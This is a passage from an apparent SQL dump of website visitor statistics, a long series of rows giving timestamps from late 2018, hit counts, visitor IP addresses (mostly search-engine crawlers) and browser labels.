343353,1543571243,1,1,0,0,'54.36.148.50','other'),(343354,1543571324,3,3,0,0,'91.196.178.169','chrome'),(343355,1543571451,2,2,0,0,'91.196.178.75','chrome'),(343356,1543571563,1,1,0,0,'95.163.255.95','other'),(343357,1543571566,1,1,0,0,'95.163.255.93','other'),(343358,1543571643,1,1,0,0,'54.36.149.7','other'),(343359,1543571669,2,2,0,0,'66.249.66.156','chrome'),(343360,1543571803,1,1,0,0,'91.237.107.23','chrome'),(343361,1543572016,1,1,0,0,'54.36.148.138','other'),(343362,1543572018,1,1,0,0,'54.36.148.114','other'),(343363,1543572056,1,1,0,0,'54.36.148.193','other'),(343364,1543572247,1,1,0,0,'54.36.148.240','other'),(343365,1543572515,1,1,0,0,'54.36.148.141','other'),(343366,1543572550,1,1,0,0,'95.163.255.65','other'),(343367,1543572554,1,1,0,0,'95.163.255.68','other'),(343368,1543572741,1,1,0,0,'66.249.66.156','chrome'),(343369,1543572825,1,1,0,0,'46.229.168.149','other'),(343370,1543572884,1,1,0,0,'54.36.148.236','other'),(343371,1543572945,1,1,0,0,'54.36.148.238','other'),(343372,1543573235,1,1,0,0,'54.36.148.27','other'),(343373,1543573484,1,1,0,0,'31.43.31.9','chrome'),(343374,1543573627,1,1,0,0,'54.36.148.232','other'),(343375,1543573743,3,3,0,0,'66.249.66.156','chrome'),(343376,1543573912,1,1,0,0,'54.36.148.157','other'),(343377,1543574086,1,1,0,0,'207.46.13.102','other'),(343378,1543574200,1,1,0,0,'54.36.149.54','other'),(343379,1543574455,1,1,0,0,'54.36.148.112','other'),(343380,1543574472,1,1,0,0,'54.36.148.57','other'),(343381,1543574566,1,1,0,0,'46.229.168.141','other'),(343382,1543574576,4,4,0,0,'91.196.178.167','chrome'),(343383,1543574779,2,2,0,0,'95.163.255.64','other'),(343384,1543574845,1,1,0,0,'46.242.74.142','msie'),(343385,1543574995,1,1,0,0,'40.77.167.136','other'),(343386,1543575397,1,1,0,0,'207.46.13.84','other'),(343387,1543576026,2,2,0,0,'66.249.66.156','chrome'),(343388,1543576180,1,1,0,0,'54.36.148.43','other'),(343389,1543576323,1,1,0,0,'178.95.246.220','chrome'),(343390,1543576375,3,3,0,0,'66.249.66.152','chrome'),(343391,1543576428,1,1,0,0,'66.249.66.154','chrome'),(343392,1543576819,1,1,0,0,'5.45.207.79','other'),(343393,1543576820,1,1,0,0,'178.154.244.29','other'),(343394,1543576821,1,1,0,0,'87.250.224.65','other'),(343395,1543577129,1,1,0,0,'46.229.168.136','other'),(343396,1543577289,1,1,0,0,'54.36.149.70','other'),(343397,1543577434,1,1,0,0,'46.229.168.152','other'),(343398,1543577913,7,7,0,0,'178.154.244.29','other'),(343399,1543578047,4,4,0,0,'178.154.244.11','other'),(343400,1543578063,1,1,0,0,'207.46.13.84','other'),(343401,1543578076,1,1,0,0,'54.36.149.78','other'),(343402,1543578112,2,2,0,0,'5.45.207.79','other'),(343403,1543578142,1,1,0,0,'54.36.148.39','other'),(343404,1543578199,3,3,0,0,'91.196.178.69','chrome'),(343405,1543578431,1,1,0,0,'54.36.148.212','other'),(343406,1543578507,1,1,0,0,'54.36.148.56','other'),(343407,1543578531,1,1,0,0,'46.211.71.187','chrome'),(343408,1543578562,1,1,0,0,'8.29.198.25','other'),(343409,1543579186,1,1,0,0,'46.229.168.130','other'),(343410,1543579409,1,1,0,0,'54.36.148.34','other'),(343411,1543579775,1,1,0,0,'37.55.30.230','chrome'),(343412,1543579918,1,1,0,0,'54.36.148.58','other'),(343413,1543579927,1,1,0,0,'66.249.66.156','chrome'),(343414,1543579931,2,2,0,0,'66.249.66.152','chrome'),(343415,1543580241,2,2,0,0,'91.124.182.170','firefox'),(343416,1543580244,1,1,0,0,'54.36.149.8','other'),(343417,1543580405,1,1,0,0,'8.29.198.25','other'),(343418,1543580762,1,1,0,0,'8.29.198.27','other'),(343419,1543580831,2,2,0,0,'91.196.178.71','firefox'),(343420,1543580939,2,2,0,0,'91.196.178.131','chrome'),(343421,1543581083,1,1,0,0,'54.36.149.102','other'),(343422,1543581142,1,1,0,0,'66.249.66.57','chrome'),(343423,1543581143,1,1,0,0,'66.249.66.44','chrome'),(343424,1543581243,1,1,0,0,'54.36.148.12','other'),(343425,1543581429,1,1,0,0,'54.36.149.98','other'),(343426,1543581539,1,1,0,0,'66.249.66.42','chrome'),(343427,1543581564,1,1,0,0,'66.249.66.40','chrome'),(343428,1543581612,2,2,0,0,'207.46.13.84','other'),(343429,1543581716,2,2,0,0,'94.178.107.235','firefox'),(343430,1543581769,1,1,0,0,'54.36.148.27','other'),(343431,1543582277,1,1,0,0,'46.229.168.149','other'),(343432,1543582408,1,1,0,0,'40.77.167.138','other'),(343433,1543582605,1,1,0,0,'54.36.148.249','other'),(343434,1543582651,1,1,0,0,'54.36.148.228','other'),(343435,1543582665,1,1,0,0,'54.36.148.47','other'),(343436,1543582672,1,1,0,0,'54.36.148.64','other'),(343437,1543583388,1,1,0,0,'46.229.168.150','other'),(343438,1543583464,2,2,0,0,'66.249.66.154','chrome'),(343439,1543583598,1,1,0,0,'66.249.66.44','chrome'),(343440,1543583708,1,1,0,0,'207.46.13.102','other'),(343441,1543583789,1,1,0,0,'54.36.149.58','other'),(343442,1543584065,1,1,0,0,'66.249.66.152','chrome'),(343443,1543584186,1,1,0,0,'46.229.168.136','other'),(343444,1543584187,1,1,0,0,'66.249.66.156','chrome'),(343445,1543584969,1,1,0,0,'54.36.148.194','other'),(343446,1543584988,1,1,0,0,'54.36.148.140','other'),(343447,1543585034,1,1,0,0,'66.249.66.44','chrome'),(343448,1543585204,2,2,0,0,'178.154.244.11','other'),(343449,1543585268,3,3,0,0,'5.45.207.79','other'),(343450,1543585275,2,2,0,0,'178.154.244.29','other'),(343451,1543585311,1,1,0,0,'54.36.149.3','other'),(343452,1543585389,1,1,0,0,'54.36.148.174','other'),(343453,1543585475,1,1,0,0,'66.249.66.155','chrome'),(343454,1543585502,1,1,0,0,'66.249.66.154','chrome'),(343455,1543585551,1,1,0,0,'54.36.149.97','other'),(343457,1543585590,3,3,0,0,'40.77.167.136','other'),(343458,1543585595,4,4,0,0,'207.46.13.160','other'),(343459,1543585600,1,1,0,0,'207.46.13.102','other'),(343460,1543585604,3,3,0,0,'40.77.167.138','other'),(343461,1543585657,1,1,0,0,'66.249.66.152','chrome'),(343462,1543585786,2,2,0,0,'91.196.178.75','chrome'),(343463,1543585836,1,1,0,0,'87.250.224.47','other'),(343464,1543585923,1,1,0,0,'54.36.149.33','other'),(343465,1543585960,1,1,0,0,'91.196.178.90','chrome'),(343466,1543586062,1,1,0,0,'37.9.113.148','other'),(343467,1543586198,1,1,0,0,'54.36.148.107','other'),(343468,1543586513,2,2,0,0,'178.154.244.11','other'),(343469,1543586549,7,7,0,0,'178.154.244.29','other'),(343470,1543586665,1,1,0,0,'54.36.148.222','other'),(343471,1543586687,1,1,0,0,'54.36.148.237','other'),(343472,1543586787,1,1,0,0,'66.249.66.152','chrome'),(343473,1543586991,2,2,0,0,'195.5.1.66','firefox'),(343474,1543587089,2,2,0,0,'54.36.148.163','other'),(343475,1543587284,1,1,0,0,'66.249.66.156','chrome'),(343476,1543587378,2,2,0,0,'91.196.178.69','firefox'),(343477,1543587530,1,1,0,0,'178.154.244.29','other'),(343478,1543587782,1,1,0,0,'54.36.149.94','other'),(343479,1543588190,1,1,0,0,'54.36.149.49','other'),(343480,1543588271,1,1,0,0,'5.45.207.79','other'),(343481,1543588472,1,1,0,0,'54.36.149.59','other'),(343482,1543588501,1,1,0,0,'54.36.148.241','other'),(343483,1543588551,2,2,0,0,'178.154.244.29','other'),(343484,1543588567,1,1,0,0,'178.154.244.11','other'),(343485,1543588575,1,1,0,0,'66.249.66.156','chrome'),(343486,1543588708,1,1,0,0,'95.163.255.95','other'),(343487,1543588711,1,1,0,0,'95.163.255.97','other'),(343488,1543589369,1,1,0,0,'54.36.148.67','other'),(343489,1543589396,1,1,0,0,'8.29.198.27','other'),(343490,1543589413,1,1,0,0,'5.45.207.19','other'),(343491,1543589424,2,2,0,0,'40.77.167.136','other'),(343492,1543589473,1,1,0,0,'66.249.66.40','chrome'),(343493,1543589503,1,1,0,0,'212.111.203.178','other'),(343494,1543589821,2,2,0,0,'40.77.167.138','other'),(343495,1543589977,1,1,0,0,'54.36.148.211','other'),(343496,1543590110,1,1,0,0,'46.229.168.151','other'),(343497,1543590120,1,1,0,0,'46.229.168.132','other'),(343498,1543590131,1,1,0,0,'66.249.66.155','chrome'),(343500,1543590291,1,1,0,0,'54.36.149.62','other'),(343501,1543590322,2,2,0,0,'54.36.148.44','other'),(343502,1543590424,1,1,0,0,'54.36.148.176','other'),(343503,1543590501,1,1,0,0,'54.36.148.144','other'),(343504,1543590512,3,3,0,0,'66.249.66.154','chrome'),(343505,1543590520,1,1,0,0,'54.36.148.85','other'),(343506,1543590822,1,1,0,0,'54.36.148.59','other'),(343507,1543591044,1,1,0,0,'40.77.167.136','other'),(343508,1543591086,3,3,0,0,'66.249.66.156','chrome'),(343509,1543591254,1,1,0,0,'8.29.198.27','other'),(343510,1543591273,1,1,0,0,'66.249.66.152','chrome'),(343511,1543591280,1,1,0,0,'54.208.102.37','other'),(343512,1543591327,1,1,0,0,'54.36.148.90','other'),(343513,1543591576,1,1,0,0,'54.36.148.164','other'),(343514,1543591595,1,1,0,0,'8.29.198.26','other'),(343515,1543591802,1,1,0,0,'66.249.66.154','chrome'),(343516,1543592058,2,2,0,0,'46.211.149.3','chrome'),(343517,1543592388,1,1,0,0,'54.36.148.129','other'),(343518,1543592460,1,1,0,0,'207.46.13.160','other'),(343519,1543592567,1,1,0,0,'46.229.168.138','other'),(343520,1543592574,1,1,0,0,'46.229.168.140','other'),(343521,1543592662,2,2,0,0,'66.249.64.199','chrome'),(343522,1543592686,1,1,0,0,'54.36.148.29','other'),(343523,1543592695,2,2,0,0,'66.249.64.220','chrome'),(343524,1543592755,1,1,0,0,'54.36.149.40','other'),(343525,1543592908,1,1,0,0,'66.249.64.222','chrome'),(343526,1543592969,1,1,0,0,'54.36.149.68','other'),(343527,1543592978,1,1,0,0,'5.45.207.79','other'),(343528,1543593215,1,1,0,0,'54.36.149.101','other'),(343529,1543593301,1,1,0,0,'54.36.148.69','other'),(343530,1543593364,1,1,0,0,'54.36.148.208','other'),(343531,1543593366,1,1,0,0,'54.36.149.36','other'),(343532,1543593385,2,2,0,0,'91.209.11.236','other'),(343533,1543593667,1,1,0,0,'54.36.148.45','other'),(343534,1543593714,1,1,0,0,'66.249.64.218','chrome'),(343535,1543593763,1,1,0,0,'54.36.149.102','other'),(343536,1543593782,1,1,0,0,'54.36.149.103','other'),(343537,1543594123,1,1,0,0,'54.36.149.86','other'),(343538,1543594193,1,1,0,0,'54.36.148.125','other'),(343539,1543594204,1,1,0,0,'54.36.148.76','other'),(343540,1543594248,1,1,0,0,'54.36.148.15','other'),(343541,1543594317,1,1,0,0,'207.46.13.198','other'),(343542,1543594371,1,1,0,0,'54.36.148.156','other'),(343543,1543594442,1,1,0,0,'46.229.168.142','other'),(343544,1543594730,1,1,0,0,'46.229.168.145','other'),(343545,1543594732,1,1,0,0,'46.229.168.129','other'),(343546,1543594795,1,1,0,0,'54.36.148.223','other'),(343547,1543594945,2,2,0,0,'91.196.178.169','chrome'),(343548,1543594994,1,1,0,0,'66.249.64.218','chrome'),(343549,1543595078,2,2,0,0,'40.77.167.138','other'),(343550,1543595235,2,2,0,0,'54.36.148.225','other'),(343551,1543595305,1,1,0,0,'54.36.148.197','other'),(343552,1543595382,1,1,0,0,'207.46.13.198','other'),(343553,1543595560,1,1,0,0,'54.36.148.116','other'),(343554,1543595567,1,1,0,0,'54.36.149.42','other'),(343555,1543595620,1,1,0,0,'54.36.148.56','other'),(343556,1543595627,1,1,0,0,'180.76.15.152','other'),(343557,1543595698,1,1,0,0,'66.249.64.220','chrome'),(343558,1543595759,1,1,0,0,'207.46.13.160','other'),(343559,1543595779,1,1,0,0,'54.36.148.63','other'),(343560,1543595869,1,1,0,0,'5.45.207.19','other'),(343561,1543595873,1,1,0,0,'5.45.207.79','other'),(343562,1543595876,1,1,0,0,'37.9.113.103','other'),(343563,1543596014,1,1,0,0,'66.249.64.199','chrome'),(343564,1543596015,2,2,0,0,'66.249.64.218','chrome'),(343565,1543596109,1,1,0,0,'54.36.148.226','other'),(343566,1543596174,1,1,0,0,'54.36.148.166','other'),(343567,1543596191,1,1,0,0,'54.36.149.86','other'),(343568,1543596237,1,1,0,0,'54.36.148.203','other'),(343569,1543596331,1,1,0,0,'66.249.64.61','chrome'),(343570,1543596332,1,1,0,0,'66.249.64.40','chrome'),(343571,1543596428,1,1,0,0,'46.229.168.142','other'),(343572,1543596659,1,1,0,0,'66.249.64.201','chrome'),(343573,1543596734,1,1,0,0,'54.36.148.42','other'),(343574,1543596825,1,1,0,0,'54.36.148.105','other'),(343575,1543597041,1,1,0,0,'46.229.168.130','other'),(343576,1543597304,1,1,0,0,'46.229.168.145','other'),(343577,1543597345,1,1,0,0,'178.154.244.11','other'),(343578,1543597399,1,1,0,0,'54.36.148.52','other'),(343579,1543597481,1,1,0,0,'54.36.149.83','other'),(343580,1543597499,1,1,0,0,'46.229.168.154','other'),(343581,1543597600,1,1,0,0,'54.36.148.208','other'),(343582,1543597626,1,1,0,0,'180.76.15.19','other'),(343583,1543597627,1,1,0,0,'180.76.15.152','other'),(343584,1543597997,1,1,0,0,'54.36.148.184','other'),(343585,1543598077,1,1,0,0,'54.36.149.96','other'),(343586,1543598194,1,1,0,0,'66.249.64.42','chrome'),(343587,1543598319,2,2,0,0,'66.249.64.222','chrome'),(343588,1543598328,1,1,0,0,'54.36.148.16','other'),(343589,1543598373,1,1,0,0,'95.108.213.4','other'),(343590,1543598568,1,1,0,0,'46.229.168.135','other'),(343591,1543598601,1,1,0,0,'207.46.13.198','other'),(343592,1543598678,2,2,0,0,'40.77.167.138','other'),(343593,1543598691,1,1,0,0,'54.36.148.158','other'),(343594,1543598757,2,2,0,0,'178.154.244.29','other'),(343595,1543598970,1,1,0,0,'54.36.148.56','other'),(343596,1543599126,1,1,0,0,'54.36.149.102','other'),(343597,1543599178,2,2,0,0,'46.229.168.143','other'),(343598,1543599186,1,1,0,0,'46.229.168.140','other'),(343599,1543599299,1,1,0,0,'54.36.148.240','other'),(343600,1543599381,1,1,0,0,'66.249.64.201','chrome'),(343601,1543599403,1,1,0,0,'66.249.64.220','chrome'),(343602,1543599418,1,1,0,0,'66.249.64.42','chrome'),(343603,1543599621,1,1,0,0,'207.46.13.198','other'),(343604,1543599661,1,1,0,0,'207.46.13.160','other'),(343605,1543599699,1,1,0,0,'46.229.168.146','other'),(343606,1543600116,1,1,0,0,'40.77.167.136','other'),(343607,1543600147,1,1,0,0,'40.77.167.138','other'),(343608,1543600234,1,1,0,0,'8.29.198.25','other'),(343609,1543600301,1,1,0,0,'54.36.148.29','other'),(343610,1543600608,1,1,0,0,'54.36.148.164','other'),(343611,1543600643,1,1,0,0,'54.36.149.83','other'),(343612,1543601010,1,1,0,0,'54.36.148.147','other'),(343613,1543601067,1,1,0,0,'5.45.207.19','other'),(343614,1543601342,1,1,0,0,'54.36.149.97','other'),(343615,1543601480,1,1,0,0,'54.36.148.35','other'),(343616,1543601585,1,1,0,0,'54.36.148.159','other'),(343617,1543601645,1,1,0,0,'66.249.64.40','chrome'),(343618,1543601665,1,1,0,0,'54.36.148.229','other'),(343619,1543602108,1,1,0,0,'66.249.64.201','chrome'),(343620,1543602116,1,1,0,0,'8.29.198.25','other'),(343621,1543602135,1,1,0,0,'66.249.64.220','chrome'),(343622,1543602395,1,1,0,0,'54.36.149.24','other'),(343623,1543602432,1,1,0,0,'8.29.198.27','other'),(343624,1543602706,1,1,0,0,'54.36.148.120','other'),(343625,1543602788,1,1,0,0,'54.36.149.13','other'),(343626,1543602800,1,1,0,0,'46.229.168.144','other'),(343627,1543603362,1,1,0,0,'66.249.64.222','chrome'),(343628,1543603522,1,1,0,0,'54.36.148.34','other'),(343629,1543603759,2,2,0,0,'91.196.178.175','chrome'),(343630,1543603823,1,0,1,0,'66.249.64.220',''),(343631,1543603953,1,1,0,0,'40.77.167.138','other'),(343632,1543604055,2,2,0,0,'66.249.64.220','chrome'),(343633,1543604111,2,2,0,0,'207.46.13.198','other'),(343634,1543604313,1,1,0,0,'54.36.148.30','other'),(343635,1543604325,1,1,0,0,'207.46.13.160','other'),(343636,1543604361,1,1,0,0,'46.229.168.153','other'),(343637,1543604625,1,1,0,0,'66.249.64.222','chrome'),(343638,1543604656,1,1,0,0,'66.249.64.218','chrome'),(343639,1543604694,1,1,0,0,'178.154.244.29','other'),(343640,1543604756,1,1,0,0,'66.249.64.199','chrome'),(343641,1543604808,1,1,0,0,'54.36.148.85','other'),(343642,1543604922,1,1,0,0,'54.36.148.15','other'),(343643,1543605122,1,1,0,0,'54.36.148.60','other'),(343644,1543605144,1,1,0,0,'54.36.148.153','other'),(343645,1543605579,1,1,0,0,'54.36.149.64','other'),(343646,1543605621,1,1,0,0,'207.46.13.198','other'),(343647,1543605863,14,14,0,0,'178.154.244.29','other'),(343648,1543605922,1,1,0,0,'46.229.168.137','other'),(343649,1543606088,1,1,0,0,'54.36.148.114','other'),(343650,1543606095,6,6,0,0,'178.154.244.11','other'),(343651,1543606150,1,1,0,0,'46.229.168.148','other'),(343652,1543606337,1,1,0,0,'5.45.207.19','other'),(343653,1543606339,3,3,0,0,'40.77.167.136','other'),(343654,1543606364,4,4,0,0,'5.45.207.79','other'),(343655,1543606415,1,1,0,0,'54.36.149.7','other'),(343656,1543606422,1,1,0,0,'87.250.224.47','other'),(343657,1543606577,1,1,0,0,'54.36.149.42','other'),(343658,1543606588,1,1,0,0,'54.36.148.170','other'),(343659,1543606698,1,1,0,0,'66.249.64.195','chrome'),(343660,1543606718,1,1,0,0,'66.249.64.218','chrome'),(343661,1543607016,1,1,0,0,'54.36.148.155','other'),(343662,1543607172,1,1,0,0,'54.36.148.220','other'),(343663,1543607448,1,1,0,0,'178.154.244.11','other'),(343664,1543607473,1,1,0,0,'40.77.167.138','other'),(343665,1543607721,2,2,0,0,'207.46.13.160','other'),(343666,1543607899,1,1,0,0,'66.102.9.38','chrome'),(343667,1543607900,1,1,0,0,'46.211.123.83','chrome'),(343668,1543607960,2,2,0,0,'66.102.9.35','chrome'),(343669,1543608095,1,1,0,0,'207.46.13.198','other'),(343670,1543608195,1,1,0,0,'66.249.64.220','chrome'),(343671,1543608247,1,1,0,0,'66.249.64.222','chrome'),(343672,1543608321,1,1,0,0,'46.229.168.148','other'),(343673,1543608465,1,1,0,0,'54.36.149.101','other'),(343674,1543608642,1,1,0,0,'66.249.64.42','chrome'),(343675,1543608662,1,1,0,0,'54.36.148.214','other'),(343676,1543608687,2,2,0,0,'37.52.22.139','chrome'),(343677,1543608791,1,1,0,0,'46.211.66.14','chrome'),(343678,1543608830,1,1,0,0,'66.249.64.57','chrome'),(343679,1543608852,1,1,0,0,'66.249.64.40','chrome'),(343680,1543609088,1,1,0,0,'66.249.64.199','chrome'),(343681,1543609206,1,1,0,0,'207.46.13.198','other'),(343682,1543609779,1,1,0,0,'54.36.148.201','other'),(343683,1543610106,1,1,0,0,'54.36.148.96','other'),(343684,1543610373,1,1,0,0,'54.36.148.185','other'),(343685,1543610531,1,1,0,0,'54.36.148.54','other'),(343686,1543610569,1,1,0,0,'66.249.64.222','chrome'),(343687,1543610880,3,3,0,0,'178.154.244.29','other'),(343688,1543610885,1,1,0,0,'54.36.149.20','other'),(343689,1543611076,1,1,0,0,'8.29.198.26','other'),(343690,1543611346,1,1,0,0,'178.154.244.11','other'),(343691,1543611406,1,1,0,0,'54.36.148.158','other'),(343692,1543611446,1,1,0,0,'54.36.149.94','other'),(343693,1543611616,2,2,0,0,'40.77.167.136','other'),(343694,1543611651,1,1,0,0,'54.36.149.89','other'),(343695,1543611758,1,1,0,0,'54.36.148.233','other'),(343696,1543611909,1,1,0,0,'54.36.149.44','other'),(343697,1543611920,1,1,0,0,'54.36.148.153','other'),(343698,1543611926,1,1,0,0,'66.249.64.222','chrome'),(343699,1543612040,1,1,0,0,'66.249.64.220','chrome'),(343700,1543612042,2,2,0,0,'207.46.13.198','other'),(343701,1543612122,2,2,0,0,'178.154.244.29','other'),(343702,1543612263,1,1,0,0,'54.36.149.73','other'),(343703,1543612974,1,1,0,0,'8.29.198.27','other'),(343704,1543613032,2,2,0,0,'66.249.64.218','chrome'),(343705,1543613070,1,1,0,0,'54.36.148.101','other'),(343706,1543613263,1,1,0,0,'8.29.198.25','other'),(343707,1543613397,1,1,0,0,'207.46.13.198','other'),(343708,1543613660,1,1,0,0,'54.36.149.47','other'),(343709,1543613682,1,1,0,0,'54.36.148.35','other'),(343710,1543614016,1,1,0,0,'66.249.64.220','chrome'),(343711,1543614432,1,1,0,0,'54.36.148.38','other'),(343712,1543614456,1,1,0,0,'178.154.244.11','other'),(343713,1543614711,2,2,0,0,'40.77.167.136','other'),(343714,1543614817,1,1,0,0,'54.36.148.45','other'),(343715,1543614837,1,1,0,0,'54.36.149.25','other'),(343716,1543615158,2,2,0,0,'66.249.64.220','chrome'),(343717,1543615187,1,1,0,0,'66.249.64.44','chrome'),(343718,1543615381,1,1,0,0,'54.36.149.23','other'),(343719,1543615553,2,2,0,0,'66.249.64.195','chrome'),(343720,1543615554,2,1,1,0,'66.249.64.218',''),(343721,1543615720,2,2,0,0,'40.77.167.136','other'),(343722,1543615779,1,1,0,0,'54.36.148.212','other'),(343723,1543615809,23,23,0,0,'178.154.244.29','other'),(343724,1543615860,1,1,0,0,'54.36.149.64','other'),(343725,1543615920,1,1,0,0,'207.46.13.30','other'),(343726,1543615979,5,5,0,0,'5.45.207.79','other'),(343727,1543616013,3,3,0,0,'34.236.242.150','firefox'),(343728,1543616047,1,0,1,0,'66.249.64.201',''),(343729,1543616073,3,3,0,0,'178.154.244.11','other'),(343730,1543616496,1,1,0,0,'5.45.207.19','other'),(343731,1543616503,1,1,0,0,'87.250.224.47','other'),(343732,1543616734,4,4,0,0,'178.154.244.29','other'),(343733,1543616993,1,1,0,0,'178.154.244.11','other'),(343734,1543617002,1,1,0,0,'54.36.149.65','other'),(343735,1543617020,1,1,0,0,'66.249.64.199','chrome'),(343736,1543617045,1,1,0,0,'66.249.64.220','chrome'),(343737,1543617181,1,1,0,0,'54.36.149.17','other'),(343738,1543617555,2,2,0,0,'66.249.64.222','chrome'),(343739,1543617628,1,1,0,0,'54.36.149.22','other'),(343740,1543617785,1,1,0,0,'91.196.178.177','chrome'),(343741,1543618060,2,2,0,0,'54.36.149.94','other'),(343742,1543618301,2,2,0,0,'176.31.101.111','other'),(343743,1543618353,1,1,0,0,'54.36.148.117','other'),(343744,1543618655,1,1,0,0,'40.77.167.138','other'),(343745,1543618685,1,1,0,0,'54.36.148.224','other'),(343746,1543618901,1,1,0,0,'91.196.178.177','chrome'),(343747,1543619172,1,1,0,0,'66.249.64.218','chrome'),(343748,1543619807,1,1,0,0,'54.36.148.11','other'),(343749,1543619960,1,1,0,0,'66.249.64.201','chrome'),(343750,1543620505,1,1,0,0,'54.36.148.140','other'),(343751,1543620601,1,1,0,0,'66.249.64.222','chrome'),(343752,1543620872,1,1,0,0,'66.249.64.42','chrome'),(343753,1543620988,1,1,0,0,'66.249.64.44','chrome'),(343754,1543621057,1,1,0,0,'40.77.167.138','other'),(343755,1543621191,1,1,0,0,'54.36.149.27','other'),(343756,1543621205,1,1,0,0,'54.36.148.233','other'),(343757,1543621259,3,3,0,0,'207.46.13.198','other'),(343758,1543621411,1,1,0,0,'46.229.168.134','other'),(343759,1543621505,1,1,0,0,'54.36.148.116','other'),(343760,1543621508,1,1,0,0,'54.36.148.194','other'),(343761,1543621913,1,1,0,0,'8.29.198.25','other'),(343762,1543622032,1,1,0,0,'46.229.168.142','other'),(343763,1543622176,1,1,0,0,'40.77.167.138','other'),(343764,1543622222,1,1,0,0,'54.36.148.107','other'),(343765,1543622297,1,1,0,0,'54.36.149.67','other'),(343766,1543622525,1,1,0,0,'54.36.148.138','other'),(343767,1543622530,1,1,0,0,'95.163.255.98','other'),(343768,1543622533,1,1,0,0,'95.163.255.99','other'),(343769,1543622551,1,1,0,0,'54.36.148.114','other'),(343770,1543622573,1,1,0,0,'54.36.148.157','other'),(343771,1543622674,1,1,0,0,'54.36.148.241','other'),(343772,1543622721,1,1,0,0,'66.249.64.201','chrome'),(343773,1543623031,1,1,0,0,'54.36.148.203','other'),(343774,1543623077,2,2,0,0,'40.77.167.138','other'),(343775,1543623319,1,1,0,0,'54.36.149.53','other'),(343776,1543623364,1,1,0,0,'66.249.64.218','chrome'),(343777,1543623664,1,1,0,0,'54.36.149.42','other'),(343778,1543623684,1,1,0,0,'207.46.13.198','other'),(343779,1543623818,1,1,0,0,'8.29.198.26','other'),(343780,1543623846,1,1,0,0,'178.154.244.11','other'),(343781,1543623897,1,1,0,0,'54.36.148.165','other'),(343782,1543624095,1,1,0,0,'8.29.198.27','other'),(343783,1543624476,1,1,0,0,'54.36.148.98','other'),(343784,1543624535,1,1,0,0,'207.46.13.30','other'),(343785,1543624754,1,1,0,0,'54.36.148.76','other'),(343786,1543624833,7,7,0,0,'178.154.244.11','other'),(343787,1543624891,1,1,0,0,'66.249.64.59','chrome'),(343788,1543624922,1,1,0,0,'66.249.64.42','chrome'),(343789,1543625016,1,1,0,0,'54.36.148.209','other'),(343790,1543625123,12,12,0,0,'178.154.244.29','other'),(343791,1543625249,1,1,0,0,'54.36.148.62','other'),(343792,1543625430,1,1,0,0,'5.45.207.19','other'),(343793,1543625483,1,1,0,0,'54.36.149.26','other'),(343794,1543625603,1,1,0,0,'54.36.148.75','other'),(343795,1543625615,2,2,0,0,'62.216.43.138','chrome'),(343796,1543625657,1,1,0,0,'54.36.148.45','other'),(343797,1543625725,1,1,0,0,'178.17.166.149','other'),(343798,1543625790,2,2,0,0,'178.154.244.11','other'),(343799,1543625801,1,1,0,0,'46.229.168.141','other'),(343800,1543625882,2,2,0,0,'40.77.167.136','other'),(343801,1543626150,1,1,0,0,'54.36.148.220','other'),(343802,1543626377,2,2,0,0,'178.154.244.29','other'),(343803,1543626499,1,1,0,0,'66.249.64.42','chrome'),(343804,1543626529,1,1,0,0,'46.229.168.136','other'),(343805,1543626550,1,1,0,0,'54.36.149.44','other'),(343806,1543626849,1,1,0,0,'54.36.149.86','other'),(343807,1543626855,1,1,0,0,'54.36.148.160','other'),(343808,1543627001,1,1,0,0,'66.249.64.40','chrome'),(343809,1543627038,2,2,0,0,'66.249.64.201','chrome'),(343810,1543627039,1,1,0,0,'66.249.64.220','chrome'),(343811,1543627104,1,1,0,0,'54.36.148.199','other'),(343812,1543627216,1,1,0,0,'54.36.148.25','other'),(343813,1543627567,1,1,0,0,'54.36.148.182','other'),(343814,1543627698,1,1,0,0,'66.249.64.218','chrome'),(343815,1543627702,1,1,0,0,'54.36.148.208','other'),(343816,1543627759,1,1,0,0,'54.36.149.5','other'),(343817,1543627873,1,1,0,0,'54.36.149.27','other'),(343818,1543627956,1,1,0,0,'54.36.148.233','other'),(343819,1543628238,1,1,0,0,'178.154.244.29','other'),(343820,1543628328,1,1,0,0,'66.249.64.40','chrome'),(343821,1543628425,1,1,0,0,'54.36.148.235','other'),(343822,1543628650,1,1,0,0,'54.36.148.77','other'),(343823,1543628670,1,1,0,0,'66.249.64.201','chrome'),(343824,1543629024,1,1,0,0,'54.36.148.222','other'),(343825,1543629226,1,1,0,0,'207.46.13.198','other'),(343826,1543629294,1,1,0,0,'54.36.148.226','other'),(343827,1543629911,1,1,0,0,'207.46.13.30','other'),(343828,1543630274,1,1,0,0,'54.36.148.180','other'),(343829,1543630449,2,2,0,0,'66.249.64.220','chrome'),(343830,1543630533,1,1,0,0,'54.36.148.116','other'),(343831,1543630535,1,1,0,0,'46.229.168.136','other'),(343832,1543630552,1,1,0,0,'54.36.149.62','other'),(343833,1543630845,1,1,0,0,'54.36.149.34','other'),(343834,1543630878,2,2,0,0,'52.38.214.114','chrome'),(343835,1543630968,1,1,0,0,'54.36.148.13','other'),(343836,1543631035,2,2,0,0,'66.249.64.201','chrome'),(343837,1543631079,2,2,0,0,'207.46.13.198','other'),(343838,1543631203,1,1,0,0,'54.36.148.226','other'),(343839,1543631214,1,1,0,0,'54.36.148.121','other'),(343840,1543631449,2,2,0,0,'66.249.64.195','chrome'),(343841,1543631451,3,3,0,0,'66.249.64.220','chrome'),(343842,1543631540,1,1,0,0,'13.66.139.0','other'),(343843,1543631555,2,2,0,0,'178.154.244.29','other'),(343844,1543631695,1,1,0,0,'66.249.64.222','chrome'),(343845,1543631714,1,1,0,0,'54.36.148.66','other'),(343846,1543631810,2,2,0,0,'66.249.64.218','chrome'),(343847,1543631918,1,1,0,0,'46.229.168.150','other'),(343848,1543632087,1,1,0,0,'66.249.64.42','chrome'),(343849,1543632252,1,1,0,0,'66.249.64.201','chrome'),(343850,1543632506,1,1,0,0,'54.36.148.73','other'),(343851,1543632563,1,1,0,0,'54.36.148.110','other'),(343852,1543632599,1,1,0,0,'46.229.168.152','other'),(343853,1543632601,1,1,0,0,'46.229.168.132','other'),(343854,1543632672,6,6,0,0,'95.216.6.46','other'),(343855,1543632750,1,1,0,0,'8.29.198.27','other'),(343856,1543632757,1,1,0,0,'54.36.148.53','other'),(343857,1543632773,1,1,0,0,'54.36.149.210','other'),(343858,1543633336,1,1,0,0,'66.249.64.222','chrome'),(343859,1543633533,2,2,0,0,'178.154.244.29','other'),(343860,1543633684,1,1,0,0,'95.163.255.95','other'),(343861,1543633686,1,1,0,0,'95.163.255.96','other'),(343862,1543633875,1,1,0,0,'54.36.148.224','other'),(343863,1543633998,6,6,0,0,